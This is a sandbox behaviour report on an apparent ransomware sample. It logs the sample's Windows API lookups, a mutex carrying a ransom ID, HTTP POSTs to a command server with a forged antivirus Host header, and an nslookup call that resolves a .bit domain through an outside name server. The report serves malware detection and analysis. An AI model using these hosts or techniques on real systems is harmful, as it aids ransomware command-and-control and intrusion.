Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x74139e30 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x74144ff0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x76eef730 True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x76eed830 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x74139950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x74137a50 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x74144bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x74137810 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x74137600 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x7413a700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x74145100 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x74147b30 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x74138bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x74137990 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x76ef7a80 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x74133870 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x74146630 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x74147020 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x74146c50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x74162430 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x7413ab60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x74132af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x74131b90 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x7413a2b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x741378b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x74132ad0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x74133880 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x74137710 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x7413a6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x74146aa0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x76ee0e60 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x7413a740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x7413a720 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x74146ca0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x74139b00 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x741338a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x741323e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x74137620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x7413aac0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x7413a7e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x7413b0b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x74139bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x74162670 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x7413a940 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x74146730 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x741338c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x7413a120 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x74131b70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x741329d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x7413a040 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x74139bc0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x76ecf290 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x76ecf210 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x74131ba0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x7413a790 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x74138500 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x74145140 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x7413a290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x74137930 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x74138c10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x741619a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x76ec2bd0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x76ebefe0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x74137950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x76ebbb20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x74139f30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x741469b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x74146f60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x74146f70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x74146890 True 2
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x6f98c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x74146740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x741466a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x74146700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7413b040 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7413ace0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x76ed7dc0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x76ee4010 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x76ee2a50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7413a7b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x76ee2290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x76ee2910 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x76f07a60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x76efac00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x76eea890 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x7413ac80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x74160830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x767f6270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x7413fe80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x7413ff80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x74160e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x7413a750 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x74161240 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x7413ad60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x74161460 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x74139a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x7677ded0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x74133630 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x74146bb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x74146c40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x74146a50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x7413b1d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x7415d260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileAttributesW, address_out = 0x74146c20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexW, address_out = 0x741466f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x74146a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerSetConditionMask, address_out = 0x76ef1a40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x74146820 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x74145eb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x76eea200 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x74139fd0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x74140160 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerifyVersionInfoW, address_out = 0x74138c30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForMultipleObjects, address_out = 0x74146800 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x7413cd50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x74133690 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleInformation, address_out = 0x74146660 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x7413f640 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreatePipe, address_out = 0x74130540 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x74137830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7413d290 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x74147b50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x74146960 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x74137970 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x741468e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x741469a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x7413ac70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x741446a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceW, address_out = 0x741469f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetWindowsDirectoryW, address_out = 0x74145120 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumeInformationW, address_out = 0x74146b60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiW, address_out = 0x74137590 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x74139b90 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7415d170 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileMappingW, address_out = 0x741399b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnmapViewOfFile, address_out = 0x74139b20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MapViewOfFile, address_out = 0x74138d60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x74146a70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x74139970 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x7413ea30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x741399f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x7413f5a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathW, address_out = 0x74146b30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x74138c80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7413b000 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x76878a60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x7686f890 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x7685d9b0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x7685abd0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x7685a740 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x768bfec0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x76874f60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x76878a80 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x768792b0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x76859580 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x76878e60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x76859860 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x76855d90 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x768562e0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x76f1aee0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x768683a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x768704a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetForegroundWindow, address_out = 0x76878cb0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowLongW, address_out = 0x76853780 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x76588830 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x76de0440 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76ddf7f0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x76ddfa20 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76ddf620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptExportKey, address_out = 0x76ddfb30 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76de0590 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetKeyParam, address_out = 0x76df6bf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76de0650 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76ddfaf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76df6b30 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenKey, address_out = 0x76de3910 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyKey, address_out = 0x76de0400 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76de1030 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76ddf330 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76ddf350 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x76ddf660 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x7527d9f0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x7528f9c0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x7527e690 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x74c6d6d0 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptBinaryToStringA, address_out = 0x74c6e0f0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x6fe8d200 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersW, address_out = 0x6fe3bec0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestW, address_out = 0x6fe86ef0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectW, address_out = 0x6fe745f0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestW, address_out = 0x6fe40fd0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x6fe88490 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x6fe47320 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumDeviceDrivers, address_out = 0x74561340 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetDeviceDriverBaseNameW, address_out = 0x745613a0 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x76f5d9b0 True 7
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenRandom, address_out = 0x76de10a0 True 1230
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CheckTokenMembership, address_out = 0x76ddfb50 True 2
Fn
Driver (253)
Operation Driver Additional Information Success Count Logfile
Enumerate - load_addresses = 1703688 True 2
Fn
Enumerate - load_addresses = 5832704 True 2
Fn
Window (249)
Operation Window Name Additional Information Success Count Logfile
Find vetigisoliwomo ki class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga False 249
Fn
System (14)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = X2VS1CUM True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Sleep duration = -1 (infinite) True 1
Fn
Get Time type = System Time, time = 2018-03-14 01:00:22 (UTC) True 1
Fn
Get Time type = Ticks, time = 43203 True 1
Fn
Get Time type = Ticks, time = 51656 True 1
Fn
Get Time type = Ticks, time = 78015 True 2
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 4
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=58de2295a283c81 True 1
Fn
Environment (252)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Get Environment String name = AppData, result_out = C:\Users\Nd9E1FYi\AppData\Roaming True 1
Fn
Set Environment String name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo True 249
Fn
Ini (249)
»
Operation Filename Additional Information Success Count Logfile
Read Section Win.ini section_name = hozavofoja xewuwozeyugisehatuzagito cuheleta tofexu, data_out = ˆeìv¬Nl³H False 249
Fn
Network Behavior
HTTP Sessions (3)
Information Value
Total Data Sent 863 bytes
Total Data Received 566 bytes
Contacted Host Count 2
Contacted Hosts ipv4bot.whatismyipaddress.com, 77.244.219.151
HTTP Session #1
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 14
Operation Additional Information Success Count
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Read Response size = 10238, size_out = 14 True 1
Read Response size = 10238, size_out = 0 True 1
Close Session - True 6
HTTP Session #2
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 77.244.219.151
Server Port 80
Data Sent 272
Data Received 552
Operation Additional Information Success Count
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = HTTP, server_name = 77.244.219.151, server_port = 80 True 1
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = eighge, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/eighge True 1
Read Response size = 204798, size_out = 552 True 1
Read Response size = 204798, size_out = 0 True 1
Close Session - True 6
HTTP Session #3
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 77.244.219.151
Server Port 80
Data Sent 296
Data Received 0
Operation Additional Information Success Count
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = HTTP, server_name = 77.244.219.151, server_port = 80 True 1
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = store?steepl=aiplau&sauf=iesay, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Add HTTP Request Headers headers = Host: bitdefender.com True 1
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/store?steepl=aiplau&sauf=iesay True 1
Read Response size = 204798, size_out = 0 True 1
Close Session - True 6
Process #11: nslookup.exe
8 17
Information Value
ID #11
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup politiaromana.bit ns1.virmach.ru
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:14, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:01:09
OS Process Information
Information Value
PID 0xdc4
Parent PID 0xd40 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xDC8
0xDF4
Region
Host Behavior
Registry (7)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Module (1)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x70000 True 1
Network Behavior
DNS (2)
Operation Additional Information Success Count
Get Hostname name_out = x2vS1cum True 1
Resolve Name host = ns1.virmach.ru, address_out = 109.234.35.56 True 1
UDP Sessions (3)
Information Value
Total Data Sent 114 bytes
Total Data Received 202 bytes
Contacted Host Count 1
Contacted Hosts 109.234.35.56:53
UDP Session #1
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 44 bytes
Operation Additional Information Success Count
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
